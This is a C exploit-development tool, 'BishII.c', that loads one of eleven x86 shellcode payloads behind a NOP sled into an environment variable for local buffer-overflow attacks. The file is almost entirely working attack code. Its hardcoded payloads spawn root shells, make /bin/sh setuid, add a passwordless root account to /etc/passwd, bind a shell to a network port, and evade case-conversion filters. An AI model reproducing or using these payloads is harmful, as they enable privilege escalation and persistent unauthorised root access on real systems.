/* BishII.c by bob@dtors.net * * * Generic eggshell, was tested to * work on: * * FreeBSD 4.6-PRERELEASE * FreeBSD 4.5-RELEASE * OpenBSD 3.0 * NetBSD 1.5.2 * Linux 2.0.36 * Linux 2.2.12-20 * Linux 2.2.16-22 * Linux 2.4.7-xfs * * BishII 11 different shellcodes to be loaded * into the environment! * * Modified by mercy */ #include #include #include #define B "\033[1;30m" #define R "\033[1;31m" #define G "\033[1;32m" #define Y "\033[1;33m" #define RESTORE "\33[0;0m" #define bash "/bin/bash" #define NOP 0x90 #define NOP_LENGTH 512 /* aleph1's shellcode, execve() execution of /bin/sh */ char aleph1[]= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; /* 28 byte version of /bin/sh by bob */ char shellcode[]= "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" "\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80"; /* 31 byte version of execve() /bin/ash then exit(); by bob */ char ashellcode[]= "\x31\xc0\x50\x68\x2f\x61\x73\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80" "\x31\xc0\xb0\x01\xcd\x80"; /* Setuid(0,0) shellcode by bob */ char setuidcode[]= "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68" "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24" "\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01" "\xcd\x80"; /* makes /bin/sh suid by bob */ char chmodcode[]= "\x31\xc0\x31\xdb\x31\xc9\x53\x68\x6e\x2f\x73\x68\x68\x2f" "\x2f\x62\x69\x89\xe3\x66\xb9\xfd\x09\xb0\x0f\xcd\x80\xb0" "\x01\xcd\x80"; /* Adds root account with no passwd to /etc/passwd, by bob */ char passwdcode[]= "\x31\xc0\x31\xdb\x31\xc9\x53\x68\x73\x73\x77\x64\x68\x63" "\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\x66\xb9\x01\x04" "\xb0\x05\xcd\x80\x89\xc3\x31\xc0\x31\xd2\x68\x6e\x2f\x73" "\x68\x68\x2f\x2f\x62\x69\x68\x3a\x3a\x2f\x3a\x68\x3a\x30" "\x3a\x30\x68\x62\x6f\x62\x3a\x89\xe1\xb2\x14\xb0\x04\xcd" "\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; /* portbinding shellcode */ char portbinding[] = "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"; /* tolower evasion and execve() execution of /bin/sh */ char tolowershellcode[] = "\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0" "\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff" "\xff/bin/sh"; /* toupper evasion and execve() execution of /bin/sh */ char touppershellcode[] = "\xeb\x29\x5e\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20\x43\xe0" "\xfa\x29\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x87\xf3\x8d\x4b\x08\x8d" "\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8\xd2\xff\xff\xff\x0f\x42\x49" "\x4e\x0f\x53\x48"; /* bsd, and linux shellcode by zillion */ char multicode[] = "\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd" "\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80" "\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0" "\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50" "\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89" "\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; /* BSD shellcode by eSDee of netric.org */ char bsdcode[]= "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73" "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd" "\x80\x31\xc0\xb0\x01\xcd\x80"; char *decide(char *string); void usage(void); char *decide(char *string) { if(!(strcmp(string, "0x01"))) return((char *)&aleph1); if(!(strcmp(string, "0x02"))) return((char *)&shellcode); if(!(strcmp(string, "0x03"))) return((char *)&ashellcode); if(!(strcmp(string, "0x04"))) return((char *)&setuidcode); if(!(strcmp(string, "0x05"))) return((char *)&chmodcode); if(!(strcmp(string, "0x06"))) return((char *)&passwdcode); if(!(strcmp(string, "0x07"))) return((char *)&portbinding); if(!(strcmp(string, "0x08"))) return((char *)&tolowershellcode); if(!(strcmp(string, "0x09"))) return((char *)&touppershellcode); if(!(strcmp(string, "0x10"))) return((char *)&multicode); if(!(strcmp(string, "0x11"))) return((char *)&bsdcode); usage(); } void usage(void){ printf("%s[* BishII by bob@dtors.net *]\n", B); printf("[* *]\n"); printf("[* Select shellcode to load into *]\n"); printf("[* environment: *]\n"); printf("[* *]\n"); printf("[* 0x01: Aleph1's Shellcode *]\n"); printf("[* 0x02: 28 byte Shellcode *]\n"); printf("[* 0x03: /bin/ash Shellcode *]\n"); printf("[* 0x04: Setuid() Shellcode *]\n"); printf("[* 0x05: Set /bin/sh suid *]\n"); printf("[* 0x06: Add user to /etc/passwd *]\n"); printf("[* 0x07: PortBinding shellcode *]\n"); printf("[* 0x08: tolower /bin/sh *]\n"); printf("[* 0x09: touppper /bin/sh *]\n"); printf("[* 0x10: MULTI-OS Shellcode *]\n"); printf("[* 0x11: BSD shellcode *]\n"); printf("[* *]\n"); printf("[* http://bob.dtors.net *]%s\n\n", RESTORE); exit(0); } int main(int argc, char **argv) { char *selectcode, bish[NOP_LENGTH]; if(argc <= 1) usage(); selectcode = (char *)decide(argv[1]); memset(bish,NOP,NOP_LENGTH); memcpy(&bish[NOP_LENGTH-strlen(selectcode)],selectcode,strlen(selectcode)); memcpy(bish,"BISH=",5); putenv(bish); fprintf(stdout, "%sBish %sloaded %sinto %senviroment%s\n", B, R, G, Y, RESTORE); if(selectcode == (char *)&bsdcode) { system(bash); exit(0); } execl("/bin/sh", "sh -i", NULL); //system(bash); //take out comment for bsd and comment execl() exit(0); }